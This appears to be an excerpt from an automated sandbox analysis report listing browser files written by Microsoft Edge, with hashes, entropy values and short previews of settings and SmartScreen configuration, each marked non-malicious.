                                                                                                                                                                                                                                                                                                                    SHA-256:45FF59770005DCC4783F16AAA4B917750A5124439C0A13DE34E0B85B2AC61512
                                                                                                                                                                                                                                                                                                                    SHA-512:27420FC78C412A1F430349A39C3E0FD558A4476F1F903E198E69C7D0BD170FFC5C412D8851BBB5105F56220E112B0D7E5240ABA7B3212EA4CBD736AD22067D8C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                                    MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                                    SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                                    SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                                    SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):47
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                                    MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                                    SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                                    SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                                    SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):35
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                                    MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                                    SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                                    SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                                    SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):81
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                                    MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                                    SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                                    SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                                    SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):130439
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                                    MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                                    SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                                    SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                                    SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                                    MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                                    SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                                    SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                                    SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):57
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                                    MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                                    SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                                    SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                                    SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                                    MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                                    SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                                    SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                                    SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):575056
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                                    MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                                    SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                                    SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                                    SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):460992
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                                    MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                                    SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                                    SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                                    SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):9
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                                    MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                                    SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                                    SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                                    SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:uriCache_
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.012525499726859
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclXLPRh:YWLSGTt1o9LuLgfGBPAzkVj/T8l7Pf
                                                                                                                                                                                                                                                                                                                    MD5:454C0A3E01291DA4A820B90A5F24316F
                                                                                                                                                                                                                                                                                                                    SHA1:25DB9117B2009752634B9F709F850965FA110885
                                                                                                                                                                                                                                                                                                                    SHA-256:90B47ECC6DD474ED1F1FAE3AA291412A5FFCC1AAFDA861C55A55DFB1D7A20C96
                                                                                                                                                                                                                                                                                                                    SHA-512:2C0FD91355BB1A65117E5F3F3ADA982CBB7DB40BAB7C3BADE3E8014A412DD1E44002CFBD6F3B82D7896ACC5E5D8B6DDFEE1313BF164A3AA123E3CCD3FA75B30B
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1732801757118463}]}
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                                                                    MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                                                                    SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                                                                    SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                                                                    SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):46136
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.086469235886879
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:0MkbJrT8IeQc5daEj+KKGf4c2nS4mPLg9EprOjlqObi0JCioj7DRo+yM/42cRaLe:0Mk1rT8H1a9hjQObFJFoj7VLyMV/YosF
                                                                                                                                                                                                                                                                                                                    MD5:B78062B0ED754F8F34AA52E30DB3D0B6
                                                                                                                                                                                                                                                                                                                    SHA1:1AEBCC3BF287AA3D86D94621A0154BA5F6F10CD9
                                                                                                                                                                                                                                                                                                                    SHA-256:9A65180FA902035F3812D1D083CC4924600E495074014E67063BF70D219612F1
                                                                                                                                                                                                                                                                                                                    SHA-512:692DCA7624663BD70D38675CEF0C6983FFCA8ACA475E29EC66A997034CCFD7B549DA2101D5736D9151D710589CE13DD1C12106AE8E04235FC13610DF4F1D93CD
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5126aade-6a68-4155-9c9e-d717e6cc761b"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):44769
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.095169628576024
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xq1KKGf4c2nS4mPLg9EprON7DRo+yM/42cRaLMoskCH:z/Ps+wsI7yOmhN7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                                    MD5:A219B9BC54A3BB3399B4B8B2CF655CA5
                                                                                                                                                                                                                                                                                                                    SHA1:D0E7E9F1C6C0DE0F7D70C303748A59DFA1124326
                                                                                                                                                                                                                                                                                                                    SHA-256:706405A8AAC73F70CA516D78786441CD20C118CF04992CC43F9C616F642E5E52
                                                                                                                                                                                                                                                                                                                    SHA-512:7D7DCB9F263B37C93C88D5B3B2DF3B4ECD3105CCAFA3F7EF9B35FD38AA5216463356577959EC54F49A4AF9B56A9F6316316D22F738F46C473FA4129C23997EAE
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                    Size (bytes):44707
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.095130572740628
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kv1KKGf4c2nwsQvadHN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynTNN7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                                    MD5:B1FE92019337B04326E7159BFA777225
                                                                                                                                                                                                                                                                                                                    SHA1:3D12CD4F49A5DFC1EEB3588FEAEE0006BBA0577F
                                                                                                                                                                                                                                                                                                                    SHA-256:136234E81205970C3F8D5B0BC3C9F9FDDEAADAE93A125C17D9C78C8839366655
                                                                                                                                                                                                                                                                                                                    SHA-512:AFFDE9E6C0965858F7E2B25B6C5940BF7E1E0C5E7E51E85CC0D593D615BF6FB9ED69756A3BFDFD7AE2689F0AC7728855257F355B26FFF0D13CCB0F11765BD104
                                                                                                                                                                                                                                                                                                                    Malicious:false
